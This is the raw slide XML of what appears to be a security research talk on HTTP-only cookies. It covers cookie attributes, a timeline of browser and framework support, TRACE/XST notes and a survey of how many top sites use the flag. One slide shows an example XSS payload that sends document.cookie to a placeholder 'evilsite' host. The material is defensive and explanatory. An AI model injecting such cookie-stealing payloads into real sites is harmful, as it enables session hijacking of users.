            <a:ext cx="1243012" cy="979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" name="TextBox 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5362144" y="4267200"/>
            <a:ext cx="1700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User credentials</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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14800" y="2514600"/>
            <a:ext cx="533400" cy="55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48400" y="2590800"/>
            <a:ext cx="386720" cy="40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" name="TextBox 72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="5943600"/>
            <a:ext cx="6818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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = http://evilsite/stealyourcookie.cgi?value=document.cookie&gt;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7" name="禁止符 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="3429000"/>
            <a:ext cx="609600" cy="6096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96000" y="4191000"/>
            <a:ext cx="33345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矩形 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="1295400"/>
            <a:ext cx="3276600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/>
              <a:t>HTTP-only field prevents cookies from being read via document.cookie.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24200" y="2057400"/>
            <a:ext cx="2396169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Cookie:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Name = value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Domain = value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Expiration time = value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Path = value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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124200" y="2057400"/>
            <a:ext cx="2396169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Cookie:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Name = value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Domain = value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Expiration time = value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Path = value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a: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Httponly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="直接箭头连接符 39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="5181600"/>
            <a:ext cx="20574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867400" y="518160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Inject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 advTm="883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12882 0.18195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82 0.18195 L -0.14618 0.18195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3" grpId="0" animBg="1"/>
      <p:bldP spid="57" grpId="0"/>
      <p:bldP spid="73" grpId="3"/>
      <p:bldP spid="27" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="26" grpId="0" build="allAtOnce" animBg="1"/>
      <p:bldP spid="30" grpId="0" build="allAtOnce" animBg="1"/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Survey Results on More Sites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514600"/>
            <a:ext cx="837247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457200" y="4343400"/>
            <a:ext cx="8305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Page Functionality</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1905000"/>
            <a:ext cx="8262257" cy="2590800"/>
            <a:chOff x="457200" y="2362200"/>
            <a:chExt cx="8262257" cy="2590800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="457200" y="2362200"/>
              <a:ext cx="8262257" cy="2590800"/>
              <a:chOff x="304800" y="3429000"/>
              <a:chExt cx="8262257" cy="2590800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04800" y="3429000"/>
                <a:ext cx="8262257" cy="2590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" name="矩形 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="457200" y="3976688"/>
                <a:ext cx="2286000" cy="2286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7086600" y="2909888"/>
              <a:ext cx="1524000" cy="228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200400" y="4876800"/>
            <a:ext cx="2425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Google analytics?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="1371600"/>
            <a:ext cx="1357313" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Lots of major sites still don’t use </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTTP-only cookie</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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/>
              <a:t>HTTP-only Deployment Timeline</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 156"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3150394" y="6096000"/>
            <a:ext cx="3402806" cy="381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Ruby on Rails sets  HTTP-only on by default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cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="直接连接符 97"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5495926" y="3693765"/>
            <a:ext cx="1219199" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="95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130"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="5767968" y="3652254"/>
            <a:ext cx="1127474" cy="1421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127"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="5347903" y="3908936"/>
            <a:ext cx="605529" cy="4683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13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="3848871"/>
            <a:ext cx="8610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6411" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2002</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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86036" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2003</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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95661" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2004</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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05286" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2005</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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14911" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2006</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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536" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2007</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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34161" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2008</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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43786" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2009</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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53411" y="3629022"/>
            <a:ext cx="36548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400" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2010</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"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1524" y="3352800"/>
            <a:ext cx="1971676" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IE6 introduces HTTP-only</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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6800" y="2209800"/>
            <a:ext cx="2743200" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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Firefox extension supports HTTP-only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19600" y="2743200"/>
            <a:ext cx="2657476" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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Firefox 2.0.0.5 supports HTTP-only.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2000" y="4012406"/>
            <a:ext cx="3810001" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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Django developers consider supporting HTTP-only, but compatibility concerns held them back. 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71800" y="4996934"/>
            <a:ext cx="2608422" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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Ruby on Rails supports HTTP-only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5284113"/>
            <a:ext cx="2895600" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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TRACE method is still on by default on Apache servers and major websites [10]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14800" y="1447800"/>
            <a:ext cx="2864120" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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w3.org  specifies that browsers should disallow TRACE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1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XMLHTTPRequests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60443" y="3124200"/>
            <a:ext cx="1554957" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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IETF standard draft includes HTTP-only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67601" y="4382869"/>
            <a:ext cx="1600200" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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Still no official Django support for HTTP-only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-254675" y="4270475"/>
            <a:ext cx="134541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cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Server-side Events</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0"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6771" y="1524000"/>
            <a:ext cx="2821780" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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US-CERT vulnerability note on XST attacks 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05675" y="2209800"/>
            <a:ext cx="1838325" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Apache.org compromised by cookie stealing XSS attacks</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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0" name="椭圆 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587240" y="4027646"/>
            <a:ext cx="60960" cy="6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1" name="椭圆 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5654040" y="4130040"/>
            <a:ext cx="60960" cy="6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2" name="椭圆 135"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6035040"/>
            <a:ext cx="60960" cy="6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3" name="椭圆 137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6339840" y="5120640"/>
            <a:ext cx="60960" cy="6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4" name="椭圆 138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543799" y="4206240"/>
            <a:ext cx="60960" cy="6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5" name="椭圆 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3414653"/>
            <a:ext cx="60960" cy="6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6" name="椭圆 143"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1691640" y="1752600"/>
            <a:ext cx="60960" cy="6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7" name="椭圆 144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5334000" y="1981200"/>
            <a:ext cx="60960" cy="6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8" name="椭圆 145"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7330440" y="2887027"/>
            <a:ext cx="60960" cy="6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9" name="椭圆 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7239000" y="3472576"/>
            <a:ext cx="60960" cy="6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0" name="椭圆 147"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="2438400"/>
            <a:ext cx="60960" cy="6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1" name="椭圆 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4614864" y="2971800"/>
            <a:ext cx="60960" cy="6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75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42" name="Straight Connector 359"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1280520" y="3828630"/>
            <a:ext cx="230981" cy="47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360"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="467919" y="3845300"/>
            <a:ext cx="230981" cy="47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361"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2905722" y="3809581"/>
            <a:ext cx="230981" cy="47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362"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2093121" y="3826251"/>
            <a:ext cx="230981" cy="47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363"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4530924" y="3809581"/>
            <a:ext cx="230981" cy="47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364"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3718323" y="3826251"/>
            <a:ext cx="230981" cy="47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365"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5343525" y="3809581"/>
            <a:ext cx="230981" cy="47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366"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6968728" y="3809581"/>
            <a:ext cx="230981" cy="47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367"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6156126" y="3826251"/>
            <a:ext cx="230981" cy="47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椭圆 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="4953000"/>
            <a:ext cx="60960" cy="6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2" name="Rectangle 369"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4652963" y="4201180"/>
            <a:ext cx="2586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Python supports HTTP-only. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1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Django</a:t>
            </a:r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 unofficial patch available.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048000" y="3200400"/>
            <a:ext cx="2667000" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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IE8 fixes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1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XMLHTTPResponse</a:t>
            </a:r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 exploit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4" name="椭圆 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5624513" y="3414653"/>
            <a:ext cx="60960" cy="6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962400" y="2209800"/>
            <a:ext cx="3324889" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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TRACE method disabled by all major browsers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6" name="椭圆 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730240" y="2453640"/>
            <a:ext cx="60960" cy="6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 rot="16200000">
            <a:off x="-339205" y="2826872"/>
            <a:ext cx="1504951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cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Client/Other Events</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0"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543800" y="1371600"/>
            <a:ext cx="1357313" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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Lots of major sites still don’t use </a:t>
            </a:r>
          </a:p>
          <a:p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HTTP-only cookie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1" name="椭圆 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7422357" y="1905000"/>
            <a:ext cx="60960" cy="6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305675" y="2209800"/>
            <a:ext cx="1838325" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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Apache.org compromised by cookie stealing XSS attacks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410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Methodology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50 sites collected from Alexa.com world top 100 popular sites.</a:t>
            </a:r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Manually registered accounts and collected post-login cookie properties of all sites.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524000" y="2438400"/>
            <a:ext cx="6826250" cy="615905"/>
            <a:chOff x="838200" y="2276475"/>
            <a:chExt cx="6826250" cy="61590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8200" y="2362200"/>
              <a:ext cx="1447800" cy="530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90800" y="2438400"/>
              <a:ext cx="1194435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34000" y="2276475"/>
              <a:ext cx="1114425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781800" y="2362200"/>
              <a:ext cx="8826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038600" y="2362200"/>
              <a:ext cx="1057275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" name="组合 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4267200" y="3962400"/>
            <a:ext cx="609600" cy="609600"/>
            <a:chOff x="1295400" y="3429000"/>
            <a:chExt cx="838200" cy="8382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295400" y="3429000"/>
              <a:ext cx="719137" cy="690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加号 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1676400" y="3810000"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="mathPlus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5" name="直接箭头连接符 14"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3074" idx="2"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2677980" y="2624225"/>
            <a:ext cx="1159140" cy="2019300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stCxn id="3075" idx="2"/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3701199" y="3134893"/>
            <a:ext cx="1000125" cy="654887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stCxn id="3079" idx="2"/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4405097" y="3114459"/>
            <a:ext cx="971550" cy="724333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>
            <a:stCxn id="3076" idx="2"/>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5067551" y="2703983"/>
            <a:ext cx="1232120" cy="1786804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stCxn id="3077" idx="2"/>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5733507" y="2038027"/>
            <a:ext cx="1232120" cy="3118716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10000" y="3200400"/>
            <a:ext cx="1676400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7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Httponly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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Tm="4889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Survey Results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533400" y="914400"/>
          <a:ext cx="7848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6" name="组合 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="2590800"/>
            <a:ext cx="1447800" cy="1981200"/>
            <a:chOff x="7086600" y="3429000"/>
            <a:chExt cx="999845" cy="146146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86600" y="3429000"/>
              <a:ext cx="999845" cy="347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086600" y="4191000"/>
              <a:ext cx="990600" cy="329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086600" y="4648200"/>
              <a:ext cx="990600" cy="242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086600" y="3810000"/>
              <a:ext cx="882826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9" name="组合 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6553200" y="2133600"/>
            <a:ext cx="1447800" cy="2593605"/>
            <a:chOff x="1905000" y="3505200"/>
            <a:chExt cx="838200" cy="160300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905000" y="3505200"/>
              <a:ext cx="838200" cy="216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985790" y="3764911"/>
              <a:ext cx="590780" cy="308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985790" y="4111193"/>
              <a:ext cx="590780" cy="308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905000" y="4495800"/>
              <a:ext cx="81915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905000" y="4876800"/>
              <a:ext cx="838200" cy="231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17" name="内容占位符 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="838200"/>
          <a:ext cx="7848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18" name="矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="5029200"/>
            <a:ext cx="548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err="1" smtClean="0"/>
              <a:t>Kapil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Singh et al (2010 Oakland) also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>gave similar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>results on  the deployment of HTTP-only cookies:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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2057400" y="5791200"/>
            <a:ext cx="4819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HTTP-only: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16.2% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>on 100,000</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advTm="521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18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838200" y="1397000"/>
          <a:ext cx="7315200" cy="517313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63040"/>
                <a:gridCol w="1463040"/>
                <a:gridCol w="1463040"/>
                <a:gridCol w="1463040"/>
                <a:gridCol w="1463040"/>
              </a:tblGrid>
              <a:tr h="66886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Frameworks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Version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Date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HTTP-only</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Support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HTTP-only Default</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
